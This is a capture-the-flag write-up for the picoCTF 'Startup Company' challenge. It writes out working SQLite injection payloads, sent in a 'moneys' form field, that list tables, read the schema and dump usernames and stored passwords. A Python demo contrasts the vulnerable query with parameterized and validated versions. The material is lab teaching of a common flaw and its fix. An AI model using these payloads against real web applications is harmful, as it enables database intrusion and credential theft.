# Startup Company (180)

## Problem

Do you want to fund my startup?

{% embed url="http://mercury.picoctf.net:5070/" %}

## Solution

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-7a3229a0c64db2338f6c6ccd09623461651a61d9%2Fe48e746db6734b4faa91e2a7cd354ce9.png?alt=media)

The query probably looks something like:

```sql
UPDATE some_table
SET 
    latest_contribution = <POST.moneys>
WHERE
    user_id = <SESSION.user_id>
```

So we can get information displayed in the green text by manipulating the `moneys=` parameter:
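To make the inferred query shape concrete from the defender's side, here is an added example (not code from the challenge or the writeup) that builds the same table in an in-memory SQLite database and runs the table-name payload through three versions of the `UPDATE`: the string-spliced form the writeup guesses at, a parameterized form, and a parameterized form with integer validation. The schema, rows and the balanced variant of the payload (it adds a closing `|| '` so the statement stays syntactically valid) are constructed for the demo.

```python
import sqlite3

# Constructed in-memory schema that mirrors the table and column names the
# writeup recovers (startup_users / nameuser / wordpass); the rows are made up.
SCHEMA = """
CREATE TABLE startup_users (
    user_id             INTEGER PRIMARY KEY,
    nameuser            TEXT NOT NULL,
    wordpass            TEXT NOT NULL,
    latest_contribution INTEGER DEFAULT 0
);
INSERT INTO startup_users VALUES (1, 'investor', 'not-a-real-secret', 0);
INSERT INTO startup_users VALUES (2, 'the_real_flag', 'picoCTF{placeholder}', 0);
"""

# Constructed variant of the writeup's table-name payload: the trailing || ''
# closes the string literal that the vulnerable query opens around the value.
PAYLOAD = "' || (SELECT GROUP_CONCAT(tbl_name) FROM sqlite_master) || '"


def fresh_db():
    """Return a new in-memory database populated with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def stored_contribution(conn, user_id):
    """Read back what actually ended up in latest_contribution."""
    row = conn.execute(
        "SELECT latest_contribution FROM startup_users WHERE user_id = ?",
        (user_id,),
    ).fetchone()
    return row[0]


def update_vulnerable(conn, user_id, moneys):
    """The shape the writeup infers: the POST value is spliced into the SQL text."""
    sql = (
        "UPDATE startup_users SET latest_contribution = '%s' WHERE user_id = %d"
        % (moneys, user_id)
    )
    conn.execute(sql)  # the subquery inside moneys is now part of the statement
    return stored_contribution(conn, user_id)


def update_parameterized(conn, user_id, moneys):
    """Bound parameter: SQLite receives the value as data, never as SQL."""
    conn.execute(
        "UPDATE startup_users SET latest_contribution = ? WHERE user_id = ?",
        (moneys, user_id),
    )
    return stored_contribution(conn, user_id)


def update_validated(conn, user_id, moneys):
    """Parameter binding plus type validation: a contribution must be an integer."""
    try:
        amount = int(moneys)
    except (TypeError, ValueError):
        return None  # reject the request instead of storing arbitrary text
    conn.execute(
        "UPDATE startup_users SET latest_contribution = ? WHERE user_id = ?",
        (amount, user_id),
    )
    return stored_contribution(conn, user_id)


if __name__ == "__main__":
    # vulnerable: the subquery runs and the table name is written to the column
    print("vulnerable   :", update_vulnerable(fresh_db(), 1, PAYLOAD))
    # parameterized: the payload is stored verbatim as a harmless string
    print("parameterized:", update_parameterized(fresh_db(), 1, PAYLOAD))
    # validated: the payload is rejected, a real amount is accepted
    print("validated    :", update_validated(fresh_db(), 1, PAYLOAD))
    print("validated    :", update_validated(fresh_db(), 1, "100"))
```

The first call stores `startup_users` in the contribution column, which is exactly the "green text" leak the writeup relies on; the parameterized call stores the payload string itself, and the validated call refuses it. Binding is the fix, and rejecting non-numeric input on top of it keeps junk out of a column that is supposed to hold an amount.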

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-ebe6375efb794e9078800992a325891b1fb3a48c%2F69736eaa20634168b28afd74b366f2bf.png?alt=media)

The SQLite version is 3.22.0:

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-d2c3987d980c89c6a5f82b0c91da58fbcb9c25bc%2F71b28b0ba90c4d118356b410cd704bb7.png?alt=media)

### Getting Table Names

`captcha=23&moneys=' || (SELECT GROUP_CONCAT(tbl_name) FROM sqlite_master)`

Note that `GROUP_CONCAT` is required to concatenate all the `tbl_name` values into a single string; a scalar subquery without it would return only one row, so we might miss out on some valuable data.

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-c935e2eebb87ce05209cbc4a731f27bfa5da3283%2Fbb2a73e36a344a9e9120b9bd82021c73.png?alt=media)

### Getting Column Names

`captcha=53&moneys='|| (SELECT GROUP_CONCAT(sql) FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='startup_users');`

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-bafec562e576b4e40c03fc987077767883b54e59%2Ff6198ce6109f44f1ba1d30543bf9c6ba.png?alt=media)

### Dumping Data

`captcha=36&moneys='|| (SELECT GROUP_CONCAT(nameuser) FROM startup_users);`

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-8985b3dec7d826e40f93252be7f1f3b81d7e2e49%2F3f58fc451ff04cad9192181c09eacc26.png?alt=media)

Indeed, our flag is hidden in the `wordpass` value for the `the_real_flag` user!

`captcha=66&moneys='|| (SELECT GROUP_CONCAT(wordpass) FROM startup_users);`

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-692b97c115bc0226aaff87e0ac27e64e003430ac%2Fae414d1d97154c6998412d1746e9862f.png?alt=media)
